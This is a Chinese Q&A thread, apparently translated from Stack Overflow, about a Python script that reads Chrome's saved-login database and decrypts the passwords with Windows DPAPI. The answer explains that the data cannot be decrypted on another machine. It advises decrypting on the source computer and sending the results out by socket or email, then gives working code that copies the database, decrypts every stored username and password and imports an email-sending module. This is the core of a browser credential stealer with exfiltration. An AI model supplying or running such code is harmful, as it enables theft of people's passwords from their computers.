3

我有使用win32 api函数CryptProtectData使用Python脚本导出chrome密码的脚本,但解密密码不起作用下面是代码和错误错误

Traceback (most recent call last):
  File "E:\www\scripts_py\chromepass\aa.py", line 23, in <module>
    pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #This returns a tuple description and the password
pywintypes.error: (-2146893813, 'CryptProtectData', 'Key not valid for use in specified state.')

代码

import os
import sqlite3
import win32crypt

#path to user's login data
data_path = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default"

login_db = os.path.join(data_path, 'Login Data')

#db connect and query
c = sqlite3.connect(login_db)
cursor = c.cursor()
select_statement = "SELECT origin_url, username_value, password_value FROM logins"
cursor.execute(select_statement)

login_data = cursor.fetchall()

#URL: credentials dictionary
credential = {}

#decrytping the password
for url, user_name, pwd, in login_data:
    pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #This returns a tuple description and the password
    credential[url] = (user_name, pwd[1])

#writing to a text file (CAUTION: Don't leave this text file around!)
prompt = raw_input("[.] Are you sure you want to write all this sensitive data to a text file? \n[.]  or \n[>] ")
if prompt == 'y':
    with open('pwd.txt', 'w') as f:
        for url, credentials in credential.iteritems():
            if credentials[1]:
                f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n")
            else:
                f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n")
    print "[.] Successfully written to pwd.txt!"
else:
    quit()
4

1 回答 1

2

每台计算机都有自己的本地加密密钥,因此,只有加密数据的计算机才能解密它。我假设在您的情况下,您尝试从不同的计算机读取登录数据,您的 Windows 计算机没有解密密码所需的密钥,因此您会收到上述错误。我建议在源计算机上解密数据并通过打开的套接字/电子邮件将结果传递到您的目的地。

示例python代码:

import sqliteDB  as DB
import emailSender as Email
import utilities as Utilites
import win32crypt
import os
# Works only for windows

dbFileName = 'Login Data'

# Set DB source file path
data_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default" # Path to user's login data
db_file_path = os.path.join(data_path, dbFileName)

# Copy the file to different folder because the original file cant be read when chrome is open
new_data_path = os.path.expanduser('~') # Set new directory path
new_db_file_path = os.path.join(new_data_path, dbFileName)

Utilites.copyFile(db_file_path, new_data_path) # Copy the file to the new directory

dbObject = DB.sqlLiteDataBase(new_db_file_path) # Connect to the DB file
sqlQuery = "SELECT origin_url,username_value,password_value from logins;" # Set SQL query
login_data = dbObject.executeQuery(sqlQuery) # Get query results


# Decrypt the results
decrypted_data = ''
for users in login_data:
    decrypted_data += 'Domain: ' + users[0] + ', Username: ' + users[1] +  ', Password: ' + win32crypt.CryptUnprotectData(users[2], None, None, None, 0)[1].decode('utf-8') + '\n'
于 2018-08-08T09:54:46.537 回答